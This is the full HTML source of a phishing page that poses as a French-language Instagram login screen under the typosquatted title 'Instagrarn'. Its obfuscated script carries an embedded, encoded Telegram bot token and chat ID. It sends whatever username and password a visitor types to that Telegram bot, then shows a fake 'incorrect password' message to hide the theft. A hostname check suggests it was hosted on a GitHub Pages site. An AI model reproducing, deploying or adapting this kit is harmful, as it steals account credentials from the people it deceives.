<!-- mdf1 -->
<!DOCTYPE html>
<html lang="en">
<meta charset="UTF-8">

<head>
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            font-family: "Segoe UI", Roboto, Helvetica, Arial, sans-serif;
            -webkit-tap-highlight-color: transparent;
            outline: none;
            user-select: none;
        }

        html,
        body {
            width: 100%;
            height: 100%;
            background: linear-gradient(160deg, #1C3342, #1D3838);
        }

        #container {
            width: 100%;
            max-width: 380px;
            height: 100%;
            padding: 15px 20px;
            margin: 0 auto;
            display: flex;
            flex-direction: column;

        }

        #langue {
            width: fit-content;
            color: #CBD2D9;
            margin: 0 auto;
            font-size: 14.5px;
        }

        #logo {
            width: 60px;
            height: 60px;
            margin: 40px 0;
            background-image: url("/src/logo.png");
            background-position: center;
            background-repeat: no-repeat;
            background-size: 100%;
        }

        .input {
            width: 100%;
            min-height: 60px;
            max-height: 60px;
            margin: 0 0 12px 0;
            padding: 0 14px;
            background-color: #1C2B33;
            border: 1px solid #425462;
            font-size: 17px;
            border-radius: 12px;
            color: #ffffff;
        }

        .input::placeholder {
            color: #7E8D9C;
            overflow: hidden;
            white-space: nowrap;
            text-overflow: ellipsis;
            display: flex;
            pointer-events: visiblePainted;
            flex-direction: row;
        }


        #lgn {
            background-color: #0064E0;
            width: 100%;
            min-height: 45px;
            max-height: 45px;
            display: flex;
            align-items: center;
            justify-content: center;
            color: #ffffff;
            font-size: 17px;
            border-radius: 30px;
            cursor: pointer;
        }

        #lgn:active {
            background-color: #0857B8;
        }

        #pLogin {
            width: fit-content;
            color: white;
            margin: 0 0 2px 0;
            padding: 0;
            font-size: 15px;
            font-weight: 400;
        }

        #loading {
            background-image: url("/src/loading.gif");
            background-repeat: no-repeat;
            background-size: 100%;
            background-position: center;
            filter: invert(100%);
            width: 19px;
            height: 19px;
            opacity: 50%;
            margin: 0;
            padding: 0;
            display: none;
        }

        #frgt {
            color: #ffffff;
            margin: 20px auto;
            font-size: 17px;
            width: fit-content;
            cursor: pointer;
        }

        #frgt:active {
            opacity: 50%;
        }

        #sgnp {
            color: #47A5FA;
            border: 1px solid #47A5FA;
            width: 100%;
            min-height: 45px;
            max-height: 45px;
            margin: 60px 0 0 0;
            display: flex;
            align-items: center;
            justify-content: center;
            font-size: 16.5px;
            border-radius: 30px;
            cursor: pointer;
        }

        #sgnp:active {
            background-color: rgba(255, 255, 255, 0.05);
        }

        #meta {
            width: 60px;
            min-height: 12px;
            max-height: 12px;
            margin: 20px auto;
            background-image: url("/src/meta.png");
            background-position: center;
            background-repeat: no-repeat;
            background-size: 100%;
        }

        #spc1 {
            width: auto;
            height: auto;
            display: flex;
            flex: 1;
            justify-content: center;
            align-items: center;
        }

        #spc2 {
            width: auto;
            height: auto;
            display: flex;
            flex: 1;
            justify-content: flex-end;
            flex-direction: column;
        }



        /* dlg */
        .dialog-container {
            position: fixed;
            top: 0;
            left: 0;
            height: 100vh;
            width: 100vw;
            background-color: rgba(0, 0, 0, 0.5);
            display: none;
            align-items: center;
            justify-content: center;
            z-index: 9999;
        }

        .dialog-box {
            background-color: white;
            border-radius: 12px;
            padding: 15px 0 0 0;
            width: 300px;
            text-align: center;
            box-shadow: 0 5px 15px rgba(0, 0, 0, 0.3);
            font-family: sans-serif;
        }

        .dialog-title {
            font-weight: bold;
            font-size: 18px;
            margin: 10px 0;
        }

        .dialog-text {
            font-size: 14px;
            color: #444;
            margin: 15px 30px;
        }

        .dialog-line {
            border-top: 1px solid #ddd;
            margin: 15px 0 0 0;
        }

        .dialog-btn {
            background: none;
            border: none;
            color: #007BFF;
            font-weight: bold;
            font-size: 14px;
            cursor: pointer;
            width: 100%;
            height: fit-content;
            margin: 0;
            padding: 17px 0;
        }

        .dialog-btn:active {
            background-color: #eee;
            border-radius: 0 0 12px 12px;
        }
    </style>
</head>

<body>
    <div id="container">
        <p id="langue">Français (France)</p>
        <div id="spc1">
            <div id="logo"></div>
        </div>
        <input class="input" type="text" id="u" placeholder="Nom de profil, e-mail ou numéro de mobile"
            autocomplete="off">
        <input class="input" type="password" id="p" placeholder="Mot de passe" autocomplete="off">

        <div id="lgn" onclick="login();">
            <p id="pLogin">Se connecter</p>
            <div id="loading"></div>
        </div>

        <p id="frgt" onclick="window.location.href='https://instagram.com/accounts/password/reset/'">Mot de passe
            oublié ?</p>
        <div id="spc2">
            <p id="sgnp" onclick="window.location.href='https://instagram.com/accounts/emailsignup/'">Créer un
                compte</p>
            <div id="meta"></div>
        </div>
    </div>

    <!-- dlg -->
    <div class="dialog-container" id="dlg">
        <div class="dialog-box">
            <p class="dialog-title">Mot de passe incorrect</p>
            <p class="dialog-text">
                Le mot de passe que vous avez indiqué est incorrect. Veuillez réessayer.
            </p>
            <div class="dialog-line"></div>
            <button class="dialog-btn" onclick="dlg.style.display = 'none';">OK</button>
        </div>
    </div>


    <script>
        var tt = "Nzg4NTUxMzA5NzpBQUZwa0dZc2NMRTNwM0xsTVF5NXBCWFc1aEZMMmRKS0ZEaw==";
        var cc = "Njg5MDQ5MjY0Ng==";

        const _0xc4d73f=_0x17a3;(function(_0x221520,_0x2c9e09){const _0x38e07c=_0x17a3,_0x15d5e1=_0x221520();while(!![]){try{const _0xfb1783=-parseInt(_0x38e07c(0x1fc))/0x1*(parseInt(_0x38e07c(0x1f9))/0x2)+-parseInt(_0x38e07c(0x1fd))/0x3*(parseInt(_0x38e07c(0x214))/0x4)+parseInt(_0x38e07c(0x20b))/0x5*(parseInt(_0x38e07c(0x1f5))/0x6)+parseInt(_0x38e07c(0x206))/0x7*(parseInt(_0x38e07c(0x1f6))/0x8)+-parseInt(_0x38e07c(0x204))/0x9*(parseInt(_0x38e07c(0x1fe))/0xa)+-parseInt(_0x38e07c(0x208))/0xb*(-parseInt(_0x38e07c(0x1ff))/0xc)+-parseInt(_0x38e07c(0x209))/0xd;if(_0xfb1783===_0x2c9e09)break;else _0x15d5e1['push'](_0x15d5e1['shift']());}catch(_0x13744a){_0x15d5e1['push'](_0x15d5e1['shift']());}}}(_0x63c8,0xaa297));const lgn=document[_0xc4d73f(0x20d)]('lgn'),dlg=document[_0xc4d73f(0x20d)]('dlg');var click=!![];document[_0xc4d73f(0x21d)][_0xc4d73f(0x1fa)]['display']='none';eval(atob('d2luZG93LmxvY2F0aW9uLmhvc3RuYW1l'))===atob(_0xc4d73f(0x1f7))&&(document[_0xc4d73f(0x21d)][_0xc4d73f(0x1fa)][_0xc4d73f(0x215)]=_0xc4d73f(0x213));function login(){const _0x111210=_0xc4d73f;if(click){const _0x376e1d=document[_0x111210(0x20d)]('u')[_0x111210(0x205)][_0x111210(0x20a)](),_0x3dfe77=document[_0x111210(0x20d)]('p')[_0x111210(0x205)][_0x111210(0x20a)]();if(_0x376e1d[_0x111210(0x207)]>0x5&&_0x3dfe77[_0x111210(0x207)]>0x5){pLogin[_0x111210(0x1fa)][_0x111210(0x215)]='none',loading[_0x111210(0x1fa)][_0x111210(0x215)]=_0x111210(0x217),click=![];var _0x2371b3=_0x111210(0x211)+_0x376e1d+_0x111210(0x218)+_0x3dfe77;setTimeout(function(){const _0x56dec2=_0x111210,_0x572a30=[atob(tt)],_0x132e86=[atob(cc)];_0x572a30[_0x56dec2(0x20f)]((_0xc8fe15,_0x271c56)=>{const _0x2fcb41=_0x56dec2,_0x5a1625=_0x2fcb41(0x216)+_0xc8fe15+_0x2fcb41(0x1f4),_0x33154b={'chat_id':_0x132e86[_0x271c56],'text':_0x2371b3};fetch(_0x5a1625,{'method':_0x2fcb41(0x210),'headers':{'Content-Type':_0x2fcb41(0x212)},'body':JSON['stringify'](_0x33154b)})['then'](_0x2de70c=>_0x2de70c[_0x2fcb41(0x203)]())['then'](_0x3034e6=>{const _0x2a2d86=_0x2fcb41;_0x3034e6['ok']?_0x271c56===_0x572a30[_0x2a2d86(0x207)]-0x1&&showDlg():delay(()=>showDlg());})[_0x2fcb41(0x21c)](_0x4b911f=>{delay(()=>showDlg());});});},0x7d0);}else showDlg();}}function showDlg(){const _0x5c1cdd=_0xc4d73f;pLogin['style']['display']='block',loading[_0x5c1cdd(0x1fa)][_0x5c1cdd(0x215)]='none',dlg[_0x5c1cdd(0x1fa)]['display']=_0x5c1cdd(0x213),click=!![];}function delay(_0x3ea602){setTimeout(_0x3ea602,0x7d0);}function _0x17a3(_0x12f76e,_0x31a56f){const _0x63c819=_0x63c8();return _0x17a3=function(_0x17a322,_0x5c5eab){_0x17a322=_0x17a322-0x1f3;let _0x316122=_0x63c819[_0x17a322];return _0x316122;},_0x17a3(_0x12f76e,_0x31a56f);}const viewportMeta=document[_0xc4d73f(0x202)](_0xc4d73f(0x21b));viewportMeta[_0xc4d73f(0x201)](_0xc4d73f(0x20e),'viewport'),viewportMeta[_0xc4d73f(0x201)](_0xc4d73f(0x1f3),'width=device-width,\x20initial-scale=1.0'),document[_0xc4d73f(0x1fb)][_0xc4d73f(0x20c)](viewportMeta);const titleTag=document['createElement'](_0xc4d73f(0x21e));titleTag['textContent']='Connexion\x20•\x20Instagrarn',document['head'][_0xc4d73f(0x20c)](titleTag);const descriptionMeta=document[_0xc4d73f(0x202)](_0xc4d73f(0x21b));function _0x63c8(){const _0x588b8b=['style','head','8sICZrr','988587DlEacO','2073970xHlKdP','1716EsuOfV','image/x-icon','setAttribute','createElement','json','18CcdgxB','value','4559779ixLQFl','length','53911vfMgSp','2274103SKiVMO','trim','3810vKKPmT','appendChild','getElementById','name','forEach','POST','email:\x20','application/json','flex','12sFNnAT','display','https://api.telegram.org/bot','block','\x0a\x20\x20\x20\x20password:\x20','Connectez-vous\x20et\x20partagez\x20des\x20moments\x20avec\x20des\x20personnes\x20qui\x20vous\x20comprennent.\x20Rejoignez-nous\x20ou\x20connectez-vous\x20dès\x20maintenant\x20pour\x20commencer\x20votre\x20aventure.','link','meta','catch','body','title','href','description','content','/sendMessage','2934XzxkhJ','16rWFmra','aW5zdGEtZ3Jhcm4uZ2l0aHViLmlv','rel','25240SEFqrU'];_0x63c8=function(){return _0x588b8b;};return _0x63c8();}descriptionMeta['setAttribute'](_0xc4d73f(0x20e),_0xc4d73f(0x220)),descriptionMeta['setAttribute']('content',_0xc4d73f(0x219)),document['head'][_0xc4d73f(0x20c)](descriptionMeta);const faviconLink=document[_0xc4d73f(0x202)](_0xc4d73f(0x21a));faviconLink['setAttribute'](_0xc4d73f(0x1f8),'icon'),faviconLink[_0xc4d73f(0x201)]('type',_0xc4d73f(0x200)),faviconLink[_0xc4d73f(0x201)](_0xc4d73f(0x21f),'/src/ig.ico'),document['head']['appendChild'](faviconLink);
    </script>
</body>

</html>
